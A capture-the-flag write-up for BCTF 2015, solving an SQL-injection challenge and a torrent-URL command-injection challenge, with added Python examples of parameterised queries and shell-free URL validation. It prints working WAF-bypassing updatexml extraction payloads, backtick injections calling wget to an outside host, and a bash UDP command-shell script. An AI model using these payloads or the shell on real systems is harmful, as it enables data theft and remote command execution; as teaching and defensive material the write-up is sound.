BCTF is the cyber-security capture-the-flag competition run by the Blue-Lotus (蓝莲花) team. Last year it was open only to teams in China; starting this year it is open to the whole world, and players from everywhere are welcome. The winners will receive prizes.

This year's BCTF is also one of the qualifier rounds of XCTF, the national cyber-security league. The winning Chinese XCTF team advances directly to the XCTF final in Nanjing (the final is also set by Blue-Lotus); the other participating XCTF teams earn points toward the remaining final slots.

2015 results: 217, PPP and tomcr00se took the top three places.

The main challenges were as follows.

Checkin (10 points)

Desc: Please checkin at IRC

IRC: https://webchat.freenode.net/ Channels: bctf

Bulletin board:

BCTF 2015 has started. Check in flag: OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx}

Rot13 decode:

OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx} <--> BCTF{we1c0me-t0-BCTF-2015_g00d-luck}

Sqli_engine (200 points)

Desc:

https://104.197.7.111:8080/

geohot told me he has a lot of sql injection tricks. So I wrote a sql injection detection engine in defense.

Now you have a simple website protected by my engine, try to steal the admin’s password(not hash).

Injection points: the username and password fields of the register form (SQLi).

    <form id="submit-form" class="form-group" action="/register" method="POST">
      <input type="text" placeholder="username" class="form-control" name="username"/>
      <input type="password" placeholder="password" class="form-control" name="password"/>
      <span class="input-icon fui-check-inverted"></span>
      <br />
      <p class="row">
        <p class="col-xs-3">
          <button type="submit" class="btn btn-block btn-lg btn-primary">Register</button>
        </p>
        Already registered?<a href="/static/login.html">Click Here to Login</a>
      </p>
      <br />
    </form>

SQL injection (a single quote in the password breaks the statement, and the raw database error is returned to the client):

    URL:  https://104.197.7.111:8080/register
    POST: username=admin&password=,'

    error executing sql: insert into users (username, password) values ('admin', ','')
    (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '','')' at line 1")

Continue (blocked by the detection engine):

    POST: username=admin&password=,updatexml(1,(select password from users limit 1),1) or '

    password contains SQL injection, IP recorded.

Bypass WAF (the engine keys on whitespace-separated keywords, so comments replace the spaces):

    POST: username=admin&password=,updatexml(1,(/*/*/select password from/*/*/users limit/*/*/1),1) or/*/*/'

    (1105, "XPATH syntax error: '{h0w-d1d-y0u-fee1-l1ke-th3-sql1-'")

Substring right (the error message is truncated, so the tail of the password is fetched separately):

    POST: username=admin&password=,updatexml(1,(/*/*/select right(password,33)/*/*/from/*/*/users limit/*/*/1),1) or/*/*/'

    (1105, "XPATH syntax error: 'd-y0u-fee1-l1ke-th3-sql1-eng1ne}'")

String concatenation (FLAG):

{h0w-d1d-y0u-fee1-l1ke-th3-sql1-eng1ne}
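Why the detection engine could be bypassed, and what actually fixes the bug, as an added example that is not part of the original writeup or the challenge's code: a Python re-creation of the /register handler on an in-memory SQLite database (the challenge used MariaDB; the table, the admin row and the function names are constructed). The vulnerable handler splices the password into the SQL text and returns the driver's error to the client, the two defects the writeup relied on (the `,'` payload breaks the statement, and the echoed error is the channel that carries data out). The fixed handler binds the values as parameters and returns a generic message, so keyword blacklists and comment-based bypasses such as `/*/*/` are beside the point: the input can no longer change the statement.

```python
import sqlite3
from typing import Optional

# Hypothetical re-creation of the challenge's /register handler (not the
# challenge's own code), on SQLite instead of MariaDB.


def fresh_db() -> sqlite3.Connection:
    """Constructed schema and sample admin row standing in for the real table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-admin-password')")
    conn.commit()
    return conn


def register_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> str:
    """The query shape visible in the writeup's error message: user input is
    spliced into the SQL text, so a quote in the password changes the statement."""
    sql = (
        "insert into users (username, password) values "
        f"('{username}', '{password}')"
    )
    try:
        conn.execute(sql)
        conn.commit()
        return "ok"
    except sqlite3.Error as exc:
        # Echoing the driver's error to the client is the second defect: this
        # message is exactly what error-based extraction (updatexml on
        # MySQL/MariaDB) reads data out of.
        return f"error executing sql: {sql} ({exc})"


def register_fixed(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Parameterised query: the values never become part of the SQL text, so
    neither quoting nor comment tricks can alter the statement. The client
    only ever sees a generic failure message; detail goes to the server log."""
    try:
        conn.execute(
            "insert into users (username, password) values (?, ?)",
            (username, password),
        )
        conn.commit()
        return "ok"
    except sqlite3.Error as exc:
        print(f"[server log] registration failed: {exc!r}")
        return "registration failed"


def stored_password(conn: sqlite3.Connection, username: str) -> Optional[str]:
    """Read back what was stored for a user (also parameterised)."""
    row = conn.execute(
        "select password from users where username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = fresh_db()
    payload = ",'"  # the writeup's first probe
    print(register_vulnerable(db, "bob", payload))  # driver error, statement broken
    print(register_fixed(db, "bob", payload))       # "ok", payload stored literally
    print(repr(stored_password(db, "bob")))         # ",'"
```

The parameterised form is the fix; the WAF in the challenge was a compensating control in front of a query that was still built by string concatenation, which is why a whitespace-free variant of the same payload walked through it.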

Torrent_lover (233 points)

Desc: A dog loves torrent.

https://218.2.197.253/zhongzi/index.php:

Our guess: the page passes the torrent URL to a system() call, so command execution may be possible. We had no other lead.

:-(

Testing:

    https://www.google.com/`wget worm.cc:8000`/1.torrent
    https://www.google.com/`wget${IFS}worm.cc:8000`/1.torrent

Our listener received the request (404):

    root@e:/rootkit# python -m SimpleHTTPServer
    Serving HTTP on 0.0.0.0 port 8000 ...
    118.186.202.142 - - [22/Mar/2015 13:44:39] "GET / HTTP/1.1" 200 -
    118.186.202.142 - - [22/Mar/2015 13:44:41] code 404, message File not found

ubd.sh:

    #!/bin/bash
    exec 9<> /dev/udp/localhost/8088
    [ $? -eq 1 ] && exit
    echo "connect ok" >&9
    while :
    do
      a=`dd bs=200 count=1 <&9 2>/dev/null`
      if echo "$a"|grep "exit"; then
        break
      fi
      echo `$a` >&9
    done
    exec 9>&-
    exec 9<&-

nc -lu 8088
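The guess above is that the page hands the user's URL to a system() call. As an added example (not the challenge's code; the validator and helper names are my own), here is how a torrent fetcher avoids that whole class of bug in Python: parse the URL, accept only plain http(s) URLs whose host is a DNS name and whose path is a .torrent file drawn from an allowlisted character set, and run the downloader with an argv list and no shell. Both test payloads from the writeup are rejected by the validator, and even if such a string reached the downloader it would be a single inert argument, because no shell is present to interpret backticks or `${IFS}`.

```python
import re
import subprocess
from typing import List
from urllib.parse import urlsplit

# Hypothetical hardened fetcher (not the challenge's code). Two rules:
# never hand user input to a shell, and only accept URLs that match a
# tight allowlist.

ALLOWED_SCHEMES = {"http", "https"}
# Plain DNS name: labels of letters, digits and hyphens, joined by dots.
HOST_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)"
    r"(?:\.(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?))*$"
)
# Path: unreserved URL characters only, ending in .torrent.
PATH_RE = re.compile(r"^/[A-Za-z0-9._~%/-]*\.torrent$")


class InvalidTorrentUrl(ValueError):
    """Raised for anything that is not a plain http(s) URL to a .torrent file."""


def validate_torrent_url(url: str) -> str:
    """Return the URL unchanged if it passes the allowlist, else raise."""
    if not isinstance(url, str) or len(url) > 2048:
        raise InvalidTorrentUrl("bad type or length")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise InvalidTorrentUrl("scheme must be http or https")
    if parts.username is not None or parts.password is not None:
        raise InvalidTorrentUrl("credentials in the URL are not allowed")
    if not HOST_RE.match(parts.hostname or ""):
        raise InvalidTorrentUrl("host is not a plain DNS name")
    if parts.port is not None and not 1 <= parts.port <= 65535:  # may raise ValueError
        raise InvalidTorrentUrl("port out of range")
    if parts.query or parts.fragment:
        raise InvalidTorrentUrl("query strings and fragments are not allowed")
    if not PATH_RE.match(parts.path):
        raise InvalidTorrentUrl("path contains characters outside the allowlist")
    return url


def is_acceptable_torrent_url(url: str) -> bool:
    """Boolean wrapper; urlsplit itself can raise ValueError on malformed input."""
    try:
        validate_torrent_url(url)
        return True
    except (InvalidTorrentUrl, ValueError):
        return False


def download_argv(url: str, dest: str) -> List[str]:
    """argv for the downloader. The URL is one argument: backticks, $(...) and
    ${IFS} inside it are never interpreted because no shell is involved."""
    return ["wget", "-q", "-O", dest, validate_torrent_url(url)]


def download_torrent(url: str, dest: str) -> int:
    """Run the downloader without a shell and return its exit status."""
    proc = subprocess.run(download_argv(url, dest), shell=False, timeout=30, check=False)
    return proc.returncode


if __name__ == "__main__":
    # Constructed inputs: one benign URL and the two probes from the writeup.
    samples = [
        "https://example.com/files/1.torrent",
        "https://www.google.com/`wget worm.cc:8000`/1.torrent",
        "https://www.google.com/`wget${IFS}worm.cc:8000`/1.torrent",
    ]
    for s in samples:
        print("accept" if is_acceptable_torrent_url(s) else "reject", s)
```

The validator is the first line of defence and the argv call is the second; either alone is weaker than the pair, since an allowlist can be loosened later and a downloader invoked through a shell would still interpret whatever the allowlist let through.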
